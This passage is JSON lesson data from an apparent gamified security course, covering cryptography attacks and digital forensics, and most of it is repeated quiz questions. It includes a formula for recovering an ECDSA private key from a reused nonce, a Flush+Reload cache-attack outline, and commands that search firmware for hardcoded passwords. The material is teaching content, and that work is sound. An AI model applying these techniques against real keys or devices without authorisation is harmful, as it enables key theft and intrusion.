bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-ecc-attacks","cat":"Cryptography","title":"Elliptic Curve Attacks","diff":4,"xp":250,"intro":"Invalid curve, twist attacks, ECDSA nonce reuse.","sections":[{"type":"text","content":"Reusing nonce k in ECDSA reveals the private key."},{"type":"code","lang":"python","content":"# ECDSA nonce reuse: same r = same k\nk = ((hash1 - hash2) * inverse(s1 - s2, n)) % n\nprivate_key = ((s1 * k - hash1) * inverse(r, n)) % n"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"ECDSA nonce reuse reveals...","opts":["The message","The private key","The public key","Curve parameters"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-quantum","cat":"Cryptography","title":"Post-Quantum Cryptography","diff":4,"xp":250,"intro":"Quantum computers break RSA and ECC.","sections":[{"type":"text","content":"Shor's algorithm factors in polynomial time. NIST selected Kyber and Dilithium."},{"type":"code","lang":"bash","content":"# RSA-2048: broken by ~4000 qubits\n# AES-256: quantum resistant\n# NIST PQC: ML-KEM (Kyber), ML-DSA (Dilithium)"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Shor's algorithm breaks...","opts":["AES","RSA and ECC","SHA-256","All encryption"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-side-channel","cat":"Cryptography","title":"Side-Channel Attacks","diff":4,"xp":300,"intro":"Extract keys from power, EM, and cache measurements.","sections":[{"type":"text","content":"DPA measures power, EM attacks measure emissions, Flush+Reload times cache."},{"type":"code","lang":"python","content":"# Flush+Reload:\n# 1. Flush target from cache\n# 2. Wait for victim\n# 3. Reload: fast=hit (victim used it), slow=miss"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Spectre exploits which side channel?","opts":["Power","EM","CPU cache timing","Network latency"],"ans":2},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"fo-live","cat":"Forensics & IR","title":"Live System Acquisition","diff":1,"xp":100,"intro":"Collect volatile evidence before it's lost.","sections":[{"type":"text","content":"RAM first, then network state, processes, then disk."},{"type":"code","lang":"bash","content":"winpmem_mini_x64.exe memory.raw\nnetstat -ano > netstate.txt\ntasklist /v > processes.txt"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Why RAM first?","opts":["It's largest","It's volatile \u2014 lost on power off","Most interesting","Encrypted"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-network-ioc","cat":"Forensics & IR","title":"Network IOC Extraction","diff":2,"xp":150,"intro":"Extract indicators from network captures.","sections":[{"type":"text","content":"PCAPs reveal: suspicious IPs, DNS queries, user agents, beaconing patterns."},{"type":"code","lang":"bash","content":"tshark -r capture.pcap -Y dns -T fields -e dns.qry.name | sort | uniq -c | sort -rn"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"C2 beaconing is detected by...","opts":["Packet size","Regular time intervals to the same destination","Encryption type","Port numbers"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-win-artifacts","cat":"Forensics & IR","title":"Windows Artifacts Deep Dive","diff":3,"xp":200,"intro":"Master key Windows forensic artifacts.","sections":[{"type":"text","content":"Registry, event logs, prefetch, amcache, shimcache, SRUM, USN journal."},{"type":"code","lang":"bash","content":"# Prefetch: execution evidence\ndir C:WindowsPrefetch*.pf\n# SRUM: network usage\n# USB: HKLMSYSTEMCurrentControlSetEnumUSBSTOR"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"SRUM tracks...","opts":["Passwords","App network usage over time","File changes","Registry mods"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-firmware","cat":"Forensics & IR","title":"Firmware Analysis","diff":4,"xp":250,"intro":"Extract and analyze IoT firmware.","sections":[{"type":"text","content":"Dump flash, extract filesystem, find hardcoded credentials."},{"type":"code","lang":"bash","content":"binwalk -e firmware.bin\ngrep -rn 'password|secret' extracted_fs/\nstrings firmware.bin | grep -iE 'admin|password'"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Firmware analysis starts with...","opts":["Running the device","Extracting and unpacking the binary","Network connection","Documentation"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-rootkit","cat":"Forensics & IR","title":"Memory Rootkit Detection","diff":5,"xp":300,"intro":"Find what rootkits hide from the OS.","sections":[{"type":"text","content":"Compare pslist (OS-reported) vs psscan (raw memory carved). Differences = hidden."},{"type":"code","lang":"bash","content":"vol.py -f mem.dmp pslist > pslist.txt\nvol.py -f mem.dmp psscan > psscan.txt\ndiff pslist.txt psscan.txt  # hidden processes"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Rootkits are detected by...","opts":["File sizes","Comparing OS-reported vs raw memory processes","Antivirus","Network traffic"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software 